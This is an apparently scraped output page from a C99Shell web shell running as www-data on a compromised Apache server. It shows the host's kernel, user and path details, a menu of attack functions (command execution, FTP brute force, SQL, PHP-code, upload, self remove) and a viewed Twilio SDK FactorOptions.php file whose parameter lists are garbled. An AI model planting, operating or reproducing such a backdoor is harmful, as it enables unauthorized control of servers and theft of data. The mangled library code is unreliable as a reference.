!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/Rest/Verify/V2/Service/Entity/   drwxr-xr-x
Free 13.19 GB of 57.97 GB (22.75%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FactorOptions.php (8.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Verify\V2\Service\Entity;

use 
Twilio\Options;
use 
Twilio\Values;

abstract class 
FactorOptions {
    
/**
     * @param string $authPayload Optional payload to verify the Factor for the
     *                            first time
     * @param string $friendlyName The friendly name of this Factor
     * @param string $configNotificationToken For APN, the device token. For FCM,
     *                                        the registration token
     * @param string $configSdkVersion The Verify Push SDK version used to
     *                                 configure the factor
     * @param int $configTimeStep How often, in seconds, are TOTP codes generated
     * @param int $configSkew The number of past and future time-steps valid at a
     *                        given time
     * @param int $configCodeLength Number of digits for generated TOTP codes
     * @param string $configAlg The algorithm used to derive the TOTP codes
     * @param string $configNotificationPlatform The transport technology used to
     *                                           generate the Notification Token
     * @return UpdateFactorOptions Options builder
     */
    
public static function update(string $authPayload Values::NONEstring $friendlyName Values::NONEstring $configNotificationToken Values::NONEstring $configSdkVersion Values::NONEint $configTimeStep Values::NONEint $configSkew Values::NONEint $configCodeLength Values::NONEstring $configAlg Values::NONEstring $configNotificationPlatform Values::NONE): UpdateFactorOptions {
        return new 
UpdateFactorOptions($authPayload$friendlyName$configNotificationToken$configSdkVersion$configTimeStep$configSkew$configCodeLength$configAlg$configNotificationPlatform);
    }
}

class 
UpdateFactorOptions extends Options {
    
/**
     * @param string $authPayload Optional payload to verify the Factor for the
     *                            first time
     * @param string $friendlyName The friendly name of this Factor
     * @param string $configNotificationToken For APN, the device token. For FCM,
     *                                        the registration token
     * @param string $configSdkVersion The Verify Push SDK version used to
     *                                 configure the factor
     * @param int $configTimeStep How often, in seconds, are TOTP codes generated
     * @param int $configSkew The number of past and future time-steps valid at a
     *                        given time
     * @param int $configCodeLength Number of digits for generated TOTP codes
     * @param string $configAlg The algorithm used to derive the TOTP codes
     * @param string $configNotificationPlatform The transport technology used to
     *                                           generate the Notification Token
     */
    
public function __construct(string $authPayload Values::NONEstring $friendlyName Values::NONEstring $configNotificationToken Values::NONEstring $configSdkVersion Values::NONEint $configTimeStep Values::NONEint $configSkew Values::NONEint $configCodeLength Values::NONEstring $configAlg Values::NONEstring $configNotificationPlatform Values::NONE) {
        
$this->options['authPayload'] = $authPayload;
        
$this->options['friendlyName'] = $friendlyName;
        
$this->options['configNotificationToken'] = $configNotificationToken;
        
$this->options['configSdkVersion'] = $configSdkVersion;
        
$this->options['configTimeStep'] = $configTimeStep;
        
$this->options['configSkew'] = $configSkew;
        
$this->options['configCodeLength'] = $configCodeLength;
        
$this->options['configAlg'] = $configAlg;
        
$this->options['configNotificationPlatform'] = $configNotificationPlatform;
    }

    
/**
     * The optional payload needed to verify the Factor for the first time. E.g. for a TOTP, the numeric code.
     *
     * @param string $authPayload Optional payload to verify the Factor for the
     *                            first time
     * @return $this Fluent Builder
     */
    
public function setAuthPayload(string $authPayload): self {
        
$this->options['authPayload'] = $authPayload;
        return 
$this;
    }

    
/**
     * The new friendly name of this Factor. It can be up to 64 characters.
     *
     * @param string $friendlyName The friendly name of this Factor
     * @return $this Fluent Builder
     */
    
public function setFriendlyName(string $friendlyName): self {
        
$this->options['friendlyName'] = $friendlyName;
        return 
$this;
    }

    
/**
     * For APN, the device token. For FCM, the registration token. It is used to send the push notifications. Required when `factor_type` is `push`. If specified, this value must be between 32 and 255 characters long.
     *
     * @param string $configNotificationToken For APN, the device token. For FCM,
     *                                        the registration token
     * @return $this Fluent Builder
     */
    
public function setConfigNotificationToken(string $configNotificationToken): self {
        
$this->options['configNotificationToken'] = $configNotificationToken;
        return 
$this;
    }

    
/**
     * The Verify Push SDK version used to configure the factor
     *
     * @param string $configSdkVersion The Verify Push SDK version used to
     *                                 configure the factor
     * @return $this Fluent Builder
     */
    
public function setConfigSdkVersion(string $configSdkVersion): self {
        
$this->options['configSdkVersion'] = $configSdkVersion;
        return 
$this;
    }

    
/**
     * Defines how often, in seconds, are TOTP codes generated. i.e, a new TOTP code is generated every time_step seconds. Must be between 20 and 60 seconds, inclusive
     *
     * @param int $configTimeStep How often, in seconds, are TOTP codes generated
     * @return $this Fluent Builder
     */
    
public function setConfigTimeStep(int $configTimeStep): self {
        
$this->options['configTimeStep'] = $configTimeStep;
        return 
$this;
    }

    
/**
     * The number of time-steps, past and future, that are valid for validation of TOTP codes. Must be between 0 and 2, inclusive
     *
     * @param int $configSkew The number of past and future time-steps valid at a
     *                        given time
     * @return $this Fluent Builder
     */
    
public function setConfigSkew(int $configSkew): self {
        
$this->options['configSkew'] = $configSkew;
        return 
$this;
    }

    
/**
     * Number of digits for generated TOTP codes. Must be between 3 and 8, inclusive
     *
     * @param int $configCodeLength Number of digits for generated TOTP codes
     * @return $this Fluent Builder
     */
    
public function setConfigCodeLength(int $configCodeLength): self {
        
$this->options['configCodeLength'] = $configCodeLength;
        return 
$this;
    }

    
/**
     * The algorithm used to derive the TOTP codes. Can be `sha1`, `sha256` or `sha512`
     *
     * @param string $configAlg The algorithm used to derive the TOTP codes
     * @return $this Fluent Builder
     */
    
public function setConfigAlg(string $configAlg): self {
        
$this->options['configAlg'] = $configAlg;
        return 
$this;
    }

    
/**
     * The transport technology used to generate the Notification Token. Can be `apn`, `fcm` or `none`.

    Required when `factor_type` is `push`.
     *
     * @param string $configNotificationPlatform The transport technology used to
     *                                           generate the Notification Token
     * @return $this Fluent Builder
     */
    
public function setConfigNotificationPlatform(string $configNotificationPlatform): self {
        
$this->options['configNotificationPlatform'] = $configNotificationPlatform;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Verify.V2.UpdateFactorOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0071 ]--